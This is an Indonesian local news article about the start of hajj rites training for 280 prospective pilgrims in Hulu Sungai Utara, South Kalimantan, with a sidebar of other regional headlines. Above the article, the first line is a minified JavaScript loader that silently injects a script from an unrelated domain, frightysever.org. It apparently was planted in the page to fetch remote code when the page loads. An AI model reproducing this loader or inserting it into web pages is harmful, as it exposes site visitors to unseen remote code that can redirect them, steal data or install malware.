(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Bimbingan Manasik Haji di HSU Dimulai, 280 Calon Jemaah Haji Berangkat Tahun Ini


KANALKALIMANTAN.COM, AMUNTAI – Sekertaris Daerah (Sekda) Kabupaten Hulu Sungai Utara (HSU) membuka secara resmi bimbingan manasik haji bagi jemaah reguler Kabupaten HSU yang diselenggarakan Kantor Kementerian Agama (Kemenag) Kabupaten HSU di aula Dr KH Idham Chalid, Rabu (17/4/2024).

Sekda HSU Adi Lesmana berpesan kepada calon jemaah mengikuti bimbingan manasik haji dengan bersungguh-sungguh agar nantinya para jemaah haji Kabupaten HSU dapat menjadi haji yang mabrur.

Lebih lanjut, dikatakan Sekda bahwa bimbingan manasik ini dilaksanakan dengan tujuan agar para jemaah lebih siap dan mandiri dalam melaksanakan ibadah haji.

Baca juga: Serahkan Bantuan Operasional Lapangan Aparat Penegak Hukum 

“Jadi memperoleh haji mabrur sepulang dari Tanah Suci, selain itu jemaah juga harus bisa menjaga kesehatan,” kata Adi Lesmana.

Sementara itu, Kepala Kantor Kemenag HSU Hj Nahdiyatul Husna menyebutkan total 280 calon jemaah haji Kabupaten HSU yang mengikuti kegiatan manasik haji kali ini.

“Calon jemaah haji Hulu Sungai Utara insyaallah akan berangkat pada musim haji tahun 1445 Hijriyah sebanyak 280 orang. Laki-laki 133 orang dan perempuan 147 orang,” jelasnya.

Baca juga: Bupati Banjar Lepas DPC APDESI Kabupaten Banjar Ikuti Pelantikan DPD APDESI Kalsel

Bimbingan manasik haji dilaksanakan pada dua tingkatan, yaitu pada tingkat kecamatan dan tingkat kabupaten. Manasik haji tingkat kecamatan dilaksanakan delapan kali dan tingkat kabupaten dua kali.

“Ditambah dengan bimbingan manasik haji bagi ketua regu dan ketua rombongan yang dilaksanakan satu kali pertemuan,” tambahnya.

Hj Nahdiyatul Husna mengharapkan calon jemaah haji dapat mengetahui tentang regulasi haji, kewajiban pemerintah terhadap jemaah.

Kegiatan manasik haji tingkat Kabupaten HSU dilaksanakan pada 17 April dan 30 April 2024, sedangkan untuk tingkat kecamatan akan dilaksanakan pada 20-27 April 2024.

Baca juga: Semarak Berbelanja Pasar Bauntung, Upaya Pemko Banjarbaru Tarik Pengunjung

Pada pertemuan pertama, bimbingan manasik haji tingkat kabupaten membahas mengenal dua hal yaitu kebijakan pemerintah Indonesia tentang penyelenggaraan ibadah haji dan umrah, dan kebijakan pemerintah Arab Saudi tentang penyelenggaraan ibadah haji dan umrah.

Pada ertemuan kedua, calon jemaah akan memperoleh materi tentang kebijakan pemerintah terhadap jemaah haji lansia, kebijakan pelayanan kesehatan haji, senam haji, alur perjalanan ibadah haji, hingga tata kelola daging hadyu (DAM)

Bimbingan manasik haji di tingkat kecamatan, calon jemaah akan memperoleh materi seputar hak dan kewajiban jemaah, pencegahan dan pengendalian penyakit, pemantapan ibadah, dan tata cara pelaksanaan ibadah haji reguler dan lansia.(Kanalkalimantan.com/dew) 

Reporter : dew
Editor : bie


Muhammad Andi

Recent Posts

DPRD Banjarbaru Target Tiga Raperda Inisiatif Selesai Dalam Tiga Bulan

KANALKALIMANTAN.COM, BANJARBARU - Tiga buah Rancangan Peraturan Daerah (Raperda) inisiatif ditargetkan selesai dalam waktu tiga… Read More

19 menit ago

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

4 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

7 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

7 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

7 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

8 jam ago

This website uses cookies.